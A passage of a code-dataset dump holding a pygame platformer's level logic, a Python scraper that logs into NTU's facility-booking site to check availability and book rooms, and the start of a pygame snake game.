arcname=path.relative_to(source_dir))\n","repo_name":"jean-edouard-boulanger/captain","sub_path":"captain/core/fs.py","file_name":"fs.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"9730946494","text":"import pygame\r\nimport json\r\nimport os\r\nfrom pygame import mixer\r\n\r\nfrom settings import *\r\nfrom tile import *\r\nfrom player import *\r\nfrom menu import *\r\nfrom coin import *\r\nfrom achievement import *\r\nfrom spike import *\r\nfrom button import *\r\nfrom level_menu import *\r\nfrom background import *\r\nfrom door import *\r\nfrom key import *\r\nfrom turtle import *\r\n\r\nclass Level:\r\n def __init__(self, surface, data_man):\r\n self.display_surface = surface\r\n self.data_man = data_man\r\n\r\n self.done = False\r\n\r\n ### DOT ###\r\n self.dot_image = pygame.image.load(os.path.join(ROOT_DIR, 'art', 'menu dot.png'))\r\n self.dot_rect = self.dot_image.get_rect(topleft=(WIDTH / 2 - 150, HEIGHT / 2 - 100))\r\n\r\n self.selected_option = 0\r\n self.moved = False\r\n\r\n self.curr_lvl = 0\r\n self.game_state = 'menu' # false - game, true - in menu\r\n\r\n ### LEVEL ###\r\n self.world_shift = 0\r\n\r\n self.static_player_pos_x = 6 * tile_size\r\n self.player_shift = 0\r\n\r\n self.spike_time = 2.5\r\n self.trigger_state = None\r\n\r\n self.temp_points = 0 # collected during a level\r\n self.keys_collected = 0\r\n\r\n ### OTHERS ###\r\n self.touches_trigger = False\r\n self.frame = 1\r\n\r\n self.data = {\r\n 'levels_completed': 0,\r\n 'coins': 0\r\n }\r\n\r\n if os.stat(os.path.join(ROOT_DIR, 'others','data.txt')).st_size == 0:\r\n self.clear_data()\r\n\r\n with open(os.path.join(ROOT_DIR, 'others','data.txt')) as datafile:\r\n self.data = json.load(datafile)\r\n\r\n self.curr_lvl = self.data[\"levels_completed\"]\r\n self.lvl_data = levels[self.data[\"levels_completed\"]]\r\n\r\n self.levitate = False\r\n\r\n self.levels_with_exit_triggered = [0, 4]\r\n self.mid_air_jumps_allowed = False\r\n\r\n self.font = pygame.font.Font(os.path.join(ROOT_DIR, 'others', 'tahoma.ttf'), 32)\r\n self.cop_font = pygame.font.Font(os.path.join(ROOT_DIR, 'others', 'tahoma.ttf'), 10)\r\n \r\n self.coin_collect_sound = mixer.Sound(os.path.join(ROOT_DIR,'sounds', 'coin sound.wav'))\r\n self.button_press_sound = mixer.Sound(os.path.join(ROOT_DIR,'sounds', 'button.mp3'))\r\n self.death_sound = mixer.Sound(os.path.join(ROOT_DIR,'sounds', 'death.mp3'))\r\n self.achievement_sound = mixer.Sound(os.path.join(ROOT_DIR,'sounds', 'achievement.mp3'))\r\n self.key_sound = mixer.Sound(os.path.join(ROOT_DIR,'sounds', 'key.mp3'))\r\n self.door_sound = mixer.Sound(os.path.join(ROOT_DIR,'sounds', 'button.mp3'))\r\n self.switch_sound = mixer.Sound(os.path.join(ROOT_DIR, 'sounds', 'switch.mp3'))\r\n\r\n self.level_tiles = pygame.sprite.Group()\r\n self.setup_level_tiles()\r\n\r\n if self.curr_lvl in self.levels_with_exit_triggered:\r\n self.setup_level(self.lvl_data, 'triggered', True) # TODO: change after saving, DONE\r\n else:\r\n self.setup_level(self.lvl_data, 'not_triggered', True)\r\n\r\n mixer.music.load(os.path.join(ROOT_DIR,'sounds', 'music1.mp3'))\r\n mixer.music.set_volume(MUSIC_VOLUME)\r\n mixer.music.play(-1)\r\n\r\n def get_input_dot(self):\r\n keys = pygame.key.get_pressed()\r\n\r\n if not self.moved:\r\n if keys[pygame.K_DOWN] or keys[pygame.K_s]:\r\n self.moved = True\r\n if self.selected_option == 2:\r\n self.selected_option = 0\r\n self.dot_rect.y = HEIGHT / 2 - 100\r\n else:\r\n self.selected_option += 1\r\n self.dot_rect.y += 75\r\n elif keys[pygame.K_UP] or keys[pygame.K_w]:\r\n self.moved = True\r\n if self.selected_option == 0:\r\n self.selected_option = 2\r\n self.dot_rect.y = HEIGHT / 2 + 50\r\n else:\r\n self.selected_option -= 1\r\n self.dot_rect.y -= 
75\r\n elif keys[pygame.K_RETURN]:\r\n self.moved = True\r\n if self.selected_option == 0:\r\n self.game_state = 'game'\r\n elif self.selected_option == 1:\r\n self.game_state = 'level_menu'\r\n elif self.selected_option == 2:\r\n self.done = True\r\n\r\n def update_dot(self):\r\n self.get_input_dot()\r\n\r\n def setup_level_tiles(self):\r\n self.level_tiles.empty()\r\n\r\n for i in range(self.data[\"levels_completed\"] + 1):\r\n self.level_tiles.add(Level_tile((0+100*i, 0), (100, 58), i))\r\n\r\n def setup_level(self, layout, state, spawn_player_higher=False, height=100):\r\n # basic setup\r\n if self.curr_lvl > self.data[\"levels_completed\"]:\r\n self.data[\"levels_completed\"] = self.curr_lvl\r\n \r\n self.keys_collected = 0\r\n self.trigger_state = state\r\n\r\n # saving data\r\n self.data_man.save_data(self.data[\"levels_completed\"], self.data[\"coins\"])\r\n\r\n self.setup_level_tiles()\r\n\r\n # menu\r\n self.menu = pygame.sprite.GroupSingle()\r\n self.menu.add(Menu((WIDTH / 2 - 114, HEIGHT / 2 - 100))) # size 228x200 px\r\n\r\n self.bckg = pygame.sprite.GroupSingle()\r\n self.bckg.add(Background((WIDTH, HEIGHT)))\r\n\r\n # mobs\r\n self.turtles = pygame.sprite.Group()\r\n\r\n # blocks\r\n self.tiles = pygame.sprite.Group()\r\n\r\n self.coins = pygame.sprite.Group()\r\n self.floating_pads = pygame.sprite.Group()\r\n\r\n # spikes\r\n self.spikes = pygame.sprite.Group()\r\n\r\n # mechanisms\r\n self.doors = pygame.sprite.Group()\r\n self.keys = pygame.sprite.Group()\r\n\r\n # player\r\n self.player = pygame.sprite.GroupSingle() \r\n\r\n # achievements\r\n self.achievement1 = pygame.sprite.GroupSingle()\r\n\r\n self.data[\"coins\"] += self.temp_points\r\n self.temp_points = 0\r\n\r\n for row_index, row in enumerate(layout):\r\n for col_index, cell in enumerate(row):\r\n if cell == 'P':\r\n self.player_shift = -(col_index * tile_size) + self.static_player_pos_x # -(col*tl - static_x) = -col*tl + static_x\r\n break\r\n\r\n # loading level\r\n for row_index, row in enumerate(layout):\r\n for col_index, cell in enumerate(row):\r\n x = (col_index * tile_size) + self.player_shift\r\n y = row_index * tile_size\r\n\r\n if cell == 'X': # block\r\n self.tiles.add(Tile('brick', (x, y)))\r\n elif cell == 'C': # coin\r\n self.coins.add(Coin(x, y))\r\n elif cell == 'P': # player\r\n player_sprite = Player((x, y)) if not spawn_player_higher else Player((x, y - height))\r\n self.player.add(player_sprite)\r\n elif cell == 'E': # exit\r\n self.tiles.add(Tile('exit_tile', (x, y), state))\r\n elif cell == 'T': # exit trigger\r\n self.tiles.add(Tile('exit_trigger', (x, y)))\r\n elif cell == 'F': # floating pad\r\n self.floating_pads.add(Floating_pad((x, y + tile_size - Floating_pad._height)))\r\n elif cell == 'R': # royal block\r\n self.tiles.add(Tile('royal_block', (x, y)))\r\n elif cell == 'D': # door\r\n self.doors.add(Door((x, y)))\r\n elif cell == 'K': # key\r\n self.keys.add(Key((x + 16, y + 16)))\r\n elif cell == 'Q': # cart\r\n self.turtles.add(Turtle((x, y + tile_size - 50)))\r\n elif cell == 'g': # green trigger\r\n self.tiles.add(Tile('green_trigger', (x, y)))\r\n elif cell == 'r': # red trigger\r\n self.tiles.add(Tile('red_trigger', (x, y)))\r\n elif cell == '@': # green inactivated\r\n self.tiles.add(Tile('green_block', (x, y), None, 'off'))\r\n elif cell == '#': # green activated\r\n self.tiles.add(Tile('green_block', (x, y), None, 'on'))\r\n elif cell == '$': # red inactivated\r\n self.tiles.add(Tile('red_block', (x, y), None, 'off'))\r\n elif cell == '^': # red activated\r\n 
self.tiles.add(Tile('red_block', (x, y), None, 'on'))\r\n elif cell == '1': # Spike up\r\n self.spikes.add(Spike('spike_up', (x, y + tile_size - 32), None))\r\n elif cell == '2': # Spike down\r\n self.spikes.add(Spike('spike_down', (x, y), None))\r\n elif cell == '3': # Spike right\r\n self.spikes.add(Spike('spike_right', (x, y), None))\r\n elif cell == '4': # spike left\r\n self.spikes.add(Spike('spike_left', (x + 32, y), None))\r\n elif cell == '5': # Angry spike up\r\n self.spikes.add(Spike('angry_spike_up', (x, y + tile_size - 32), self.spike_time))\r\n elif cell == '6': # Angry spike down\r\n self.spikes.add(Spike('angry_spike_down', (x, y), self.spike_time))\r\n elif cell == '7': # Angry spike right\r\n self.spikes.add(Spike('angry_spike_right', (x, y), self.spike_time))\r\n elif cell == '8': # Angry spike left\r\n self.spikes.add(Spike('angry_spike_left', (x + 32, y), self.spike_time))\r\n elif cell == '!': # mid air achievement\r\n self.achievement1.add(Mid_air_jump_achievement((x + 16, y + 16), 16))\r\n \r\n def scroll_x(self):\r\n player = self.player.sprite\r\n player_x = player.rect.centerx\r\n direction_x = player.direction.x\r\n\r\n if player_x < screen_width / 3.5 and direction_x < 0:\r\n self.world_shift = 6\r\n player.speed = 0\r\n elif player_x > screen_width - (screen_width / 3.5) and direction_x > 0:\r\n self.world_shift = -6\r\n player.speed = 0\r\n else:\r\n self.world_shift = 0\r\n player.speed = 6\r\n \r\n def coin_collision(self):\r\n for coin in self.coins.sprites():\r\n if coin.rect.colliderect(self.player.sprite.rect): #if player hits a coin\r\n self.coin_collect_sound.play()\r\n\r\n self.coins.remove(coin)\r\n self.temp_points += 1\r\n #self.total_points += 1\r\n \r\n def key_collision(self):\r\n for key in self.keys.sprites():\r\n if key.rect.colliderect(self.player.sprite.rect):\r\n self.key_sound.play()\r\n self.keys.remove(key)\r\n\r\n self.keys_collected += 1\r\n #self.data[\"keys\"] += 1\r\n \r\n def door_collision(self):\r\n for door in self.doors.sprites():\r\n if door.rect.colliderect(self.player.sprite.rect):\r\n if self.keys_collected > 0:\r\n self.door_sound.play()\r\n self.keys_collected -= 1\r\n\r\n self.doors.remove(door)\r\n\r\n def achievement_collision(self):\r\n if self.achievement1:\r\n player = self.player.sprite\r\n midairjumpachievement = self.achievement1.sprite\r\n\r\n if player.rect.colliderect(midairjumpachievement.rect):\r\n self.achievement_sound.play()\r\n self.achievement1.remove(self.achievement1.sprite)\r\n self.mid_air_jumps_allowed = True\r\n\r\n \r\n def floating_pad_collision(self):\r\n for pad in self.floating_pads.sprites():\r\n if pad.rect.colliderect(self.player.sprite.rect):\r\n if not pad.pressed:\r\n self.button_press_sound.play()\r\n self.levitate = True\r\n self.timer = time.time()\r\n\r\n pad.pressed = True\r\n else:\r\n pad.pressed = False\r\n\r\n def exit_trigger_collision(self):\r\n for tile in self.tiles.sprites():\r\n if tile.type == 'exit_trigger' and not self.trigger_state == 'triggered':\r\n if tile.rect.colliderect(self.player.sprite.rect):\r\n tile.state = tile.states['triggered']\r\n self.trigger_state = 'triggered'\r\n\r\n self.unlock_exit()\r\n return\r\n\r\n def exit_collision(self):\r\n for tile in self.tiles.sprites():\r\n if tile.type == 'exit_tile':\r\n if tile.rect.colliderect(self.player.sprite.rect) and self.trigger_state == 'triggered':\r\n if len(levels) >= self.curr_lvl + 2: # check if out of range\r\n self.curr_lvl += 1\r\n self.lvl_data = levels[self.curr_lvl]\r\n\r\n if self.curr_lvl in 
self.levels_with_exit_triggered:\r\n self.setup_level(self.lvl_data, 'triggered', True)\r\n else:\r\n self.setup_level(self.lvl_data, 'not_triggered', True)\r\n\r\n def spike_collision(self):\r\n for spike in self.spikes.sprites():\r\n if spike.rect.colliderect(self.player.sprite.rect):\r\n self.death()\r\n\r\n def turtle_collision(self):\r\n for turtle in self.turtles.sprites():\r\n if turtle.rect.colliderect(self.player.sprite.rect):\r\n self.death()\r\n \r\n def turtle_bounce_collision(self):\r\n for turtle in self.turtles.sprites():\r\n for tile in self.tiles.sprites():\r\n if not ((tile.type == 'red_block' and tile.state_block == 'off') or (\r\n tile.type == 'green_block' and tile.state_block == 'off'\r\n )):\r\n if tile.rect.y == turtle.rect.y - 14:\r\n if tile.rect.colliderect(turtle.rect):\r\n turtle.dir = turtle.dirs[\"right\"] if turtle.dir == turtle.dirs[\"left\"] else turtle.dirs[\"left\"]\r\n return\r\n for spike in self.spikes.sprites():\r\n # 32 50\r\n if (spike.type == 'spike_up' or (spike.type == 'angry_spike_up' and spike.state == spike.states['closed'])):\r\n if spike.rect.y == turtle.rect.y + 18: # TODO: change to height\r\n if spike.rect.colliderect(turtle.rect):\r\n turtle.dir = turtle.dirs[\"right\"] if turtle.dir == turtle.dirs[\"left\"] else turtle.dirs[\"left\"]\r\n return\r\n # 64 50\r\n elif (spike.type == 'spike_down' or spike.type == 'spike_left' or spike.type == 'angry_spike_right' or \r\n spike.type == 'angry_spike_left' or spike.type == 'spike_right' or \r\n spike.type == 'angry_spike_down'):\r\n if spike.rect.y == turtle.rect.y - 14:\r\n if spike.rect.colliderect(turtle.rect):\r\n turtle.dir = turtle.dirs[\"right\"] if turtle.dir == turtle.dirs[\"left\"] else turtle.dirs[\"left\"]\r\n return\r\n # tile_size * factor 50\r\n elif (spike.type == 'angry_spike_up' and spike.state == spike.states[\"angry\"]):\r\n if spike.rect.y == turtle.rect.y - 78: #TODO: change to spike height\r\n if spike.rect.colliderect(turtle.rect):\r\n turtle.dir = turtle.dirs[\"right\"] if turtle.dir == turtle.dirs[\"left\"] else turtle.dirs[\"left\"]\r\n return\r\n\r\n def horizontal_movement_collision(self):\r\n self.player.sprite.rect.x += self.player.sprite.direction.x * self.player.sprite.speed\r\n\r\n for tile in self.tiles.sprites():\r\n if tile.rect.colliderect(self.player.sprite.rect) and not (\r\n tile.type == 'exit_tile' or tile.type == 'exit_trigger' or\r\n (tile.type == 'green_block' and tile.state_block == 'off') or\r\n (tile.type == 'red_block' and tile.state_block == 'off')\r\n ): # then flip\r\n if self.player.sprite.direction.x < 0: # moving left\r\n self.player.sprite.rect.left = tile.rect.right\r\n elif self.player.sprite.direction.x > 0: # moving right\r\n self.player.sprite.rect.right = tile.rect.left\r\n \r\n if self.doors and self.keys_collected == 0:\r\n for door in self.doors.sprites():\r\n if door.rect.colliderect(self.player.sprite.rect): # then flip\r\n if self.player.sprite.direction.x < 0: # moving left\r\n self.player.sprite.rect.left = door.rect.right\r\n elif self.player.sprite.direction.x > 0: # moving right\r\n self.player.sprite.rect.right = door.rect.left\r\n\r\n def vertical_movement_collision(self):\r\n self.player.sprite.apply_gravity(not self.levitate)\r\n if self.player.sprite.jumped:\r\n self.touches_trigger = False\r\n\r\n for tile in self.tiles.sprites():\r\n if tile.rect.colliderect(self.player.sprite.rect) and not (\r\n tile.type == 'exit_tile' or tile.type == 'exit_trigger' or\r\n (tile.type == 'green_block' and tile.state_block == 
'off') or\r\n (tile.type == 'red_block' and tile.state_block == 'off')\r\n ): # then flip\r\n if self.player.sprite.direction.y > 0: # moving/falling down\r\n self.player.sprite.rect.bottom = tile.rect.top\r\n self.player.sprite.direction.y = 0 # glitch protection\r\n\r\n self.player.sprite.jumped = False # on the ground, allow for jumping\r\n elif self.player.sprite.direction.y < 0 or self.levitate: # moving up\r\n self.player.sprite.rect.top = tile.rect.bottom\r\n self.player.sprite.direction.y = 0 # hit a block from below = bounce down\r\n \r\n if (tile.type == 'green_trigger' or tile.type == 'red_trigger'):\r\n if not self.touches_trigger:\r\n col = 'green' if tile.type == 'green_trigger' else 'red'\r\n self.switch_sound.play()\r\n\r\n for tile_ in self.tiles.sprites():\r\n if tile_.type == f'{col}_block':\r\n tile_.switch(col)\r\n \r\n self.touches_trigger = True\r\n else:\r\n self.touches_trigger = False\r\n\r\n if self.doors and self.keys_collected == 0:\r\n for door in self.doors.sprites():\r\n if door.rect.colliderect(self.player.sprite.rect): # then flip\r\n if self.player.sprite.direction.y > 0: # moving/falling down\r\n self.player.sprite.rect.bottom = door.rect.top\r\n self.player.sprite.direction.y = 0 # glitch protection\r\n\r\n self.player.sprite.jumped = False # on the ground, allow for jumping\r\n elif self.player.sprite.direction.y < 0 or self.levitate: # moving up\r\n self.player.sprite.rect.top = door.rect.bottom\r\n self.player.sprite.direction.y = 0 # hit a block from below = bounce down\r\n\r\n # if fell down\r\n if self.player.sprite.direction.y > 0 and self.player.sprite.rect.bottom > HEIGHT:\r\n self.death()\r\n \r\n def death(self):\r\n self.death_sound.play()\r\n\r\n self.world_shift = 0\r\n self.temp_points = 0\r\n self.temp_keys = 0\r\n\r\n if self.curr_lvl in self.levels_with_exit_triggered:\r\n self.setup_level(self.lvl_data, 'triggered', True) # false if spawn without fall\r\n else:\r\n self.setup_level(self.lvl_data, 'not_triggered', True) # false if spawn without fall\r\n\r\n def show_text(self, pos, what_to_render):\r\n self.display_surface.blit(what_to_render, pos)\r\n \r\n def unlock_exit(self):\r\n unlocked1, unlocked2 = False, False\r\n for tile in self.tiles.sprites():\r\n if tile.type == 'exit_trigger':\r\n tile.image = pygame.image.load(os.path.join(ROOT_DIR, 'art', 'exit trigger2.png'))\r\n unlocked1 = True\r\n elif tile.type == 'exit_tile':\r\n tile.image = pygame.image.load(os.path.join(ROOT_DIR, 'art', 'exit2.png'))\r\n unlocked2 = True\r\n if unlocked1 and unlocked2:\r\n return \r\n\r\n def run_menu(self):\r\n self.game_state = 'menu'\r\n\r\n def run(self, keyup_, mousedown_):\r\n if self.levitate:\r\n if time.time() - self.timer >= 2:\r\n self.levitate = False\r\n else:\r\n self.player.sprite.jumped = True # disable jumping\r\n self.player.sprite.lift(2)\r\n\r\n self.scroll_x()\r\n\r\n # menu\r\n if self.game_state == 'menu':\r\n if keyup_:\r\n self.moved = False\r\n self.update_dot()\r\n\r\n self.menu.draw(self.display_surface)\r\n self.display_surface.blit(self.dot_image, (self.dot_rect.x, self.dot_rect.y))\r\n elif self.game_state == 'level_menu':\r\n self.level_tiles.update()\r\n self.level_tiles.draw(self.display_surface)\r\n\r\n for lvl_tile in self.level_tiles.sprites():\r\n if lvl_tile.click_check(mousedown_):\r\n self.temp_points = 0 # prevention\r\n self.temp_keys = 0\r\n \r\n self.curr_lvl = lvl_tile.level\r\n self.lvl_data = levels[self.curr_lvl]\r\n self.game_state = 'game'\r\n\r\n if lvl_tile.level in 
self.levels_with_exit_triggered:\r\n self.setup_level(self.lvl_data, 2, True)\r\n else:\r\n self.setup_level(self.lvl_data, 1, True)\r\n \r\n return\r\n elif self.game_state == 'game':\r\n # tiles\r\n self.tiles.update(self.world_shift)\r\n\r\n # mobs\r\n self.turtles.update(self.world_shift)\r\n self.turtle_bounce_collision()\r\n\r\n # spikes\r\n self.spikes.update(self.world_shift)\r\n\r\n # buttons\r\n self.floating_pads.update(self.world_shift)\r\n\r\n # doors and keys\r\n self.doors.update(self.world_shift)\r\n self.keys.update(self.world_shift)\r\n\r\n # coins\r\n self.coins.update(self.world_shift)\r\n\r\n # achievements\r\n self.achievement1.update(self.world_shift)\r\n\r\n # player\r\n self.player.update(self.mid_air_jumps_allowed)\r\n self.exit_trigger_collision()\r\n self.exit_collision()\r\n self.coin_collision()\r\n self.turtle_collision()\r\n self.key_collision()\r\n self.door_collision()\r\n self.spike_collision()\r\n self.floating_pad_collision()\r\n self.achievement_collision()\r\n self.horizontal_movement_collision()\r\n self.vertical_movement_collision()\r\n\r\n ###### drawing ######\r\n self.bckg.draw(self.display_surface)\r\n\r\n for tile in self.tiles.sprites():\r\n if tile.rect.x > -tile_size and tile.rect.x < WIDTH:\r\n self.display_surface.blit(tile.image, (tile.rect.x, tile.rect.y))\r\n\r\n for coin in self.coins.sprites():\r\n if coin.rect.x > -16 and coin.rect.x < WIDTH:\r\n self.display_surface.blit(coin.image, (coin.rect.x, coin.rect.y))\r\n\r\n for spike in self.spikes.sprites():\r\n if (((spike.type == 'spike_right' or spike.type == 'spike_left' \r\n or spike.type == 'angry_spike_left' or spike.type == 'angry_spike_right') and\r\n (spike.rect.x > -spike.width and spike.rect.x < WIDTH)) or ((spike.type == 'spike_up' or spike.type == 'spike_down' \r\n or spike.type == 'angry_spike_down' or spike.type == 'angry_spike_up') and\r\n (spike.rect.x > -tile_size and spike.rect.x < WIDTH))):\r\n self.display_surface.blit(spike.image, (spike.rect.x, spike.rect.y))\r\n\r\n for turtle in self.turtles.sprites():\r\n if turtle.rect.x > -tile_size and turtle.rect.x < WIDTH:\r\n self.display_surface.blit(turtle.image, (turtle.rect.x, turtle.rect.y))\r\n \r\n for floating_pad in self.floating_pads.sprites():\r\n if floating_pad.rect.x > -tile_size and floating_pad.rect.x < WIDTH:\r\n self.display_surface.blit(floating_pad.image, (floating_pad.rect.x, floating_pad.rect.y))\r\n\r\n for door in self.doors.sprites():\r\n if door.rect.x > -tile_size and door.rect.x < WIDTH:\r\n self.display_surface.blit(door.image, (door.rect.x, door.rect.y))\r\n\r\n for key in self.keys.sprites():\r\n if key.rect.x > -16 and key.rect.x < WIDTH:\r\n self.display_surface.blit(key.image, (key.rect.x, key.rect.y)) \r\n\r\n self.achievement1.draw(self.display_surface)\r\n\r\n self.player.draw(self.display_surface)\r\n\r\n if self.keys_collected > 0:\r\n self.blit_keys(self.keys_collected)\r\n\r\n # text\r\n level_txt = self.font.render(\"Poziom: \" + str(self.curr_lvl + 1), True, 'green')\r\n self.show_text((0, 0), level_txt)\r\n\r\n score = self.font.render(\"Punkty: \" + str(self.data[\"coins\"] + self.temp_points), True, 'white')\r\n self.show_text((0, level_txt.get_rect().bottom + 5), score)\r\n\r\n cop = self.cop_font.render(\"by Oliwier Moskalewicz 2022\", True, 'white')\r\n self.show_text((5, HEIGHT - 15), cop)\r\n \r\n def blit_keys(self, number):\r\n key_image = pygame.image.load(os.path.join(ROOT_DIR, 'art', 'key.png'))\r\n\r\n x = WIDTH - 37\r\n y = 5\r\n for i in range(number):\r\n 
self.display_surface.blit(key_image, (x, y))\r\n x -= 37\r\n\r\n def clear_data(self):\r\n with open(os.path.join(ROOT_DIR, 'others', 'data.txt'), 'w') as file:\r\n self.data = {\r\n 'levels_completed': 0,\r\n 'coins': 0\r\n }\r\n json.dump(self.data, file)","repo_name":"yabuszko/Projects","sub_path":"platformer/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":26561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
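The Level class in the record above checks os.stat(...).st_size and calls clear_data() before json.load, so an empty data.txt is reset to its defaults. A sketch folding that load-or-reset behaviour into one helper; load_save and DEFAULT_DATA are illustrative names, and a JSONDecodeError catch stands in for the explicit st_size check:

```python
import json

DEFAULT_DATA = {'levels_completed': 0, 'coins': 0}

def load_save(path):
    """Return saved progress, rewriting the defaults if the file is
    missing, empty or unparseable."""
    try:
        with open(path) as f:
            return json.load(f)
    except (FileNotFoundError, json.JSONDecodeError):
        with open(path, 'w') as f:
            json.dump(DEFAULT_DATA, f)
        return dict(DEFAULT_DATA)
```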
+{"seq_id":"73024827592","text":"### TODO:\r\n### During the request for facility availability, the endDataTime and startDataTime parameters should be changed.\r\n### Try successful booking\r\n\r\nimport requests\r\nimport json\r\nfrom robobrowser import RoboBrowser\r\nfrom datetime import datetime, time\r\nfrom pprint import pprint\r\n\r\n\r\nclass Booker():\r\n LOGIN_URL = \"https://ntupcb.ntu.edu.sg/fbscbs/Account/SignIn?ReturnUrl=%2ffbscbs\"\r\n FACILITY_AVALIABILITY_URL = \"https://ntupcb.ntu.edu.sg/fbscbs/Booking/CalendarData\"\r\n FACILITY_BOOKING_URL = \"https://ntupcb.ntu.edu.sg/fbscbs/Booking/Create?resourceId=\"\r\n\r\n def __init__(self, username, password):\r\n self.username = username\r\n self.password = password\r\n self.browser = RoboBrowser(parser=\"lxml\")\r\n self.browser.open(Booker.LOGIN_URL)\r\n\r\n def login(self):\r\n login_form = self.browser.get_form()\r\n login_form[\"Username\"] = self.username\r\n login_form[\"Password\"] = self.password\r\n self.browser.submit_form(login_form)\r\n if b'Incorrect domain, user name or password' in self.browser.response.content:\r\n return {\"success\": \"False\"}\r\n else:\r\n return {\"success\": \"True\"}\r\n\r\n def get_facil_avaliability(self, resource_id):\r\n r = self.browser.session.post(\r\n Booker.FACILITY_AVALIABILITY_URL,\r\n data={\r\n \"endDateTime\": \"2019-02-03T16:00:00.000Z\",\r\n \"isOnBehalf\": False,\r\n \"resourceId\": resource_id,\r\n \"startDateTime\": \"2019-01-27T16:00:00.000Z\",\r\n },\r\n headers={\r\n \"Access-Control-Allow-Origin\":\r\n \"http://webdavserver.com\",\r\n \"Access-Control-Allow-Credentials\":\r\n \"true\",\r\n \"Access-Control-Allow-Methods\":\r\n \"ACL, CANCELUPLOAD, CHECKIN, CHECKOUT, COPY, DELETE, GET, HEAD, LOCK, MKCALENDAR, MKCOL, MOVE, OPTIONS, POST, PROPFIND, PROPPATCH, PUT, REPORT, SEARCH, UNCHECKOUT, UNLOCK, UPDATE, VERSION-CONTROL\",\r\n \"Access-Control-Allow-Headers\":\r\n \"Overwrite, Destination, Content-Type, Depth, User-Agent, Translate, Range, Content-Range, Timeout, X-File-Size, X-Requested-With, If-Modified-Since, X-File-Name, Cache-Control, Location, Lock-Token, If\",\r\n \"Access-Control-Expose-Headers\":\r\n \"DAV, content-length, Allow\",\r\n \"X-Requested-With\":\r\n \"XMLHttpRequest\",\r\n \"Referer\":\r\n \"https://ntupcb.ntu.edu.sg/fbscbs/Booking/Create?resourceId=\" +\r\n str(resource_id)\r\n })\r\n self.browser._update_state(r)\r\n parsed_dict = self.format_avaliability_json(json.loads(r.content))\r\n return parsed_dict\r\n\r\n def format_avaliability_json(self, d):\r\n for booking in d['Bookings']:\r\n start_ts = int(booking['StartDateTime'][6:-5])\r\n end_ts = int(booking['EndDateTime'][6:-5])\r\n s = datetime.utcfromtimestamp(start_ts)\r\n e = datetime.utcfromtimestamp(end_ts)\r\n booking['TimeCoordinate'] = {\r\n \"Weekday\": s.weekday() + 1,\r\n \"StartTimeCoordinate\": s.hour,\r\n \"EndTimeCoordinate\" : e.hour\r\n }\r\n return d\r\n\r\n def book_facility(self,\r\n resource_id,\r\n start_time,\r\n end_time,\r\n date=datetime.today().strftime('%d/%m/%Y'),\r\n number_of_people=1,\r\n course_code=str(),\r\n purpose_of_use=str()):\r\n '''\r\n Date format: dd/mm/yyyy\r\n Time format: hh:mm:ss\r\n '''\r\n r = self.browser.session.get(Booker.FACILITY_BOOKING_URL +\r\n str(resource_id))\r\n self.browser._update_state(r)\r\n try:\r\n booking_form = self.browser.get_form()\r\n booking_form['StartDateTime.Date'] = date\r\n booking_form['EndDateTime.Date'] = date\r\n booking_form['StartDateTime.TimeOfDay'] = start_time\r\n booking_form['EndDateTime.TimeOfDay'] = 
end_time\r\n booking_form['NoOfPeopleExpected'] = number_of_people\r\n booking_form['CourseCode'] = course_code\r\n booking_form['PurposeOfUse'] = purpose_of_use\r\n except ValueError:\r\n return json.loads('{\"success\": \"False\"}')\r\n else:\r\n self.browser.submit_form(booking_form)\r\n return json.loads(self.browser.response.content)","repo_name":"l0rem1psum/NTU-Facility-Booking-API","sub_path":"booker/booking.py","file_name":"booking.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
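The Booker class above wraps a RoboBrowser session: login() submits the sign-in form and reports success as a string, get_facil_avaliability() posts for a week of calendar data, and book_facility() fills the booking form. A hypothetical driver; the credentials and resource id are placeholders, not real NTU values:

```python
# Placeholders throughout: the credentials and resource id are illustrative.
booker = Booker("student001", "password123")

if booker.login()["success"] == "True":        # login() reports success as a string
    slots = booker.get_facil_avaliability(17)  # bookings annotated with weekday/hour
    outcome = booker.book_facility(
        17, "18:00:00", "19:00:00",
        number_of_people=4,
        purpose_of_use="badminton",
    )
    print(outcome)
```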
+{"seq_id":"72481661191","text":"import pygame\nimport random\nimport math\nimport time\n\n\npygame.init()\nscreen = pygame.display.set_mode((500, 500))\nscreen_width, screen_height = screen.get_size()\n\nfont = pygame.font.SysFont(\"Courier New\", 20)\n\n#Setting up Sounds\nfood_sound = pygame.mixer.Sound('sound/eat.mp3')\ngame_over_theme_sound = pygame.mixer.Sound('sound/game_over_theme.mp3')\npygame.mixer.music.load('sound/super_mario.mp3')\npygame.mixer.music.play(-1)\n\nrunning = True\nstate = 'main menu'\n\n#Detecting collision between circle and rectangle\ndef collision(rleft, rtop, width, height,\n center_x, center_y, radius):\n rright, rbottom = rleft + width/2, rtop + height/2\n cleft, ctop = center_x-radius, center_y-radius\n cright, cbottom = center_x+radius, center_y+radius\n if rright < cleft or rleft > cright or rbottom < ctop or rtop > cbottom:\n return False\n for x in (rleft, rleft+width):\n for y in (rtop, rtop+height):\n if math.hypot(x-center_x, y-center_y) <= radius:\n return True\n if rleft <= center_x <= rright and rtop <= center_y <= rbottom:\n return True\n return False\n\n#When losing\ndef game_over() :\n game_over_theme_sound.play()\n snake.speed = 0\n time.sleep(2)\n global state\n state = 'game over'\n\nclass Snake:\n def __init__(self, x, y):\n self.size = 0\n self.elements = [[x, y]]\n self.radius = 10\n self.dx = 5\n self.dy = 0\n self.is_add = False\n self.speed = 1\n self.level = 1\n\n def draw(self):\n #Dynamically changing color\n for i in range(self.size + 1):\n if 255 - i - 20 >= 0 :\n pygame.draw.circle(screen, (255 - i - 20, 0, 0), self.elements[i], self.radius)\n else :\n pygame.draw.circle(screen, (0, 0, 0), self.elements[i], self.radius)\n\n def add_to_snake(self):\n self.size += 1\n self.elements.append([0, 0])\n self.is_add = False\n if self.size % 4 == 0 :\n self.speed += 0.1\n self.level += 1\n\n def move(self):\n if self.is_add:\n self.add_to_snake()\n\n for i in range(self.size, 0, -1):\n self.elements[i][0] = self.elements[i - 1][0]\n self.elements[i][1] = self.elements[i - 1][1]\n\n for i in range(self.size - 1, 1, -1) :\n if self.elements[0] == self.elements[i] :\n game_over()\n\n self.elements[0][0] += self.speed * self.dx\n self.elements[0][1] += 